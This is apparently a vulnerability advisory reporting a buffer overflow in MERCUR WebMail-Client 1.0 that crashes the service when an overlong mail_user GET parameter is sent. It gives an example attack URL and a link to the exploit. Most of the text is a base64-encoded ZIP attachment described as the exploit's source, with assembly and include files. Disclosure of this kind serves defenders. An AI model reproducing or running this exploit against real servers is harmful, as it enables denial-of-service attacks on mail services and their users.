COMMAND
MERCUR WebMail-Client
SYSTEMS AFFECTED
MERCUR WebMail-Client Version 1.0 port (1080)
PROBLEM
UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client
1.0 where they do not use proper bounds checking in the code who
handle the GET commands. The following all result in a Denial of
Service against the service in question. Example:
http://hostip:1080/mmain.html&mail_user=(buffer)
Where [buffer] is aprox. 1000 characters. (0) Binary or source
for this Exploit:
http://www.ussrback.com/
The Exploit crashes the remote machine service WebMail. Below is
a mimed source:
---
Content-Type: application/octet-stream; name="domrc10w.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="domrc10w.zip"
Content-MD5: m4sBp9jwTdlcppefp+y9Vg==
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
-----
SOLUTION
Nothing yet.